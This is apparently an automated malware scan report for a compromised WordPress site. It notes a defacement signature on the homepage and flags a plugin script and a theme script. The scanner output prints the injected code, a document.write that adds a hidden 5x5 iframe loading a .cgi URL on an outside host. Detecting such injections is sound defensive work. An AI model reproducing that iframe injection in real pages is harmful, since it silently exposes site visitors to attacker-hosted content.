Scanned pages/files
Request | Server response | Status |
http://neweyecomputers.com/ | 200 OK Content-Length: 6305 Content-Type: text/html | suspicious |
Deface/Content modification. The following signature was found: Hacked By Rexal Scooterist <!--
Code by Rexal Scooterist Contact : Rexal Scooterist@gmail.com FB : Rexal Scooterist Blog : --!> <!DOCTYPE HTML> <html lang="en-US"> <head> <meta name="keywords" content="Hacked By Rexal Scooterist"> <meta name="description" content="./~hack"><meta content=Hacked By Rexal Scooterist, Rexal Scooterist indonesian hacker,defacer' name='keywords'/> <meta content='Hacked By Rexal Scooterist' name='subject'/> <meta content='Hacked By Rexal Scooterist' name='Abstract'/> <meta content='Hacked By Rexal Scooterist' name='copyright'/> <meta content='Hacked By ...[7066 bytes skipped]... | ||
http://neweyecomputers.com/test404page.js | HTTP/1.1 301 Moved Permanently Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 16 Jul 2015 00:40:05 GMT Pragma: no-cache Location: http://neweyecomputers.com/test404page.js/ Server: Apache/2.2.22 Vary: User-Agent,Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=e9c28dc05323e22a74d8524c459170ec; path=/ X-Pingback: http://neweyecomputers.com/xmlrpc.php X-Powered-By: PHP/5.3.29 | clean |
http://neweyecomputers.com/test404page.js/ | 200 OK Content-Length: 12598 Content-Type: text/html | clean |
http://neweyecomputers.com/wp-includes/js/l10n.js?ver=20101110 | 200 OK Content-Length: 307 Content-Type: application/javascript | clean |
http://neweyecomputers.com/wp-includes/js/swfobject.js?ver=2.2 | 200 OK Content-Length: 10219 Content-Type: application/javascript | clean |
http://neweyecomputers.com/wp-includes/js/comment-reply.js?ver=20090102 | 200 OK Content-Length: 785 Content-Type: application/javascript | clean |
http://neweyecomputers.com/wp-includes/js/jquery/jquery.js?ver=1.4.4 | 200 OK Content-Length: 78619 Content-Type: application/javascript | clean |
http://neweyecomputers.com/wp-content/plugins/wpstorecart/php/wpsc-1.1/wpsc/wpsc-javascript.php?ver=1.3.2 | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://neweyecomputers.com/wp-content/plugins/forum-server/js/script.js | 200 OK Content-Length: 4549 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function quote(id){
var url = $F('url') + '/wp-content/plugins/forumserver/quote.php&id=' + id; new Ajax.Updater('forumtext', url, {onComplete:function(){new Effect.ScrollTo('forumtext')} }); } function surroundText(text1, text2, textarea) { if (typeof(textarea.caretPos) != "undefined" && textarea.createTextRange) { var caretPos = textarea.caretPos, temp_length = caretPos.text.length; caretPos.text = caretPos.text.char continue; if (!checkform[i].disabled) checkform[i].checked = headerfield.checked; } } function uncheckglobal(headerfield, checkform){ checkform.mod_global.checked = false; } ;document.write('<iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"></iframe>'); Antivirus reports:
Hidden iFrame found. size: 5x5 src: http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8 <iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"> | ||
http://neweyecomputers.com/wp-content/themes/traction/javascripts/traction.js | 200 OK Content-Length: 9327 Content-Type: application/javascript | suspicious |
Hidden iFrame found. size: 5x5 src: http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8 <iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: neweyecomputers.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 16 Jul 2015 00:40:05 GMT
Accept-Ranges: bytes
ETag: "de6470c-18a1-50e31f7055a0b"
Server: Apache/2.2.22
Vary: Accept-Encoding,User-Agent
Content-Length: 6305
Content-Type: text/html
Last-Modified: Tue, 03 Feb 2015 16:57:24 GMT
...6305 bytes of data.
GET / HTTP/1.1
Host: neweyecomputers.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 16 Jul 2015 00:40:05 GMT
Accept-Ranges: bytes
ETag: "de6470c-18a1-50e31f7055a0b"
Server: Apache/2.2.22
Vary: Accept-Encoding,User-Agent
Content-Length: 6305
Content-Type: text/html
Last-Modified: Tue, 03 Feb 2015 16:57:24 GMT
...6305 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: neweyecomputers.com
Referer: http://www.google.com/search?q=neweyecomputers.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: neweyecomputers.com
Referer: http://www.google.com/search?q=neweyecomputers.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=neweyecomputers.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://neweyecomputers.com/
Result: neweyecomputers.com is not infected or malware details are not published yet.
Result: neweyecomputers.com is not infected or malware details are not published yet.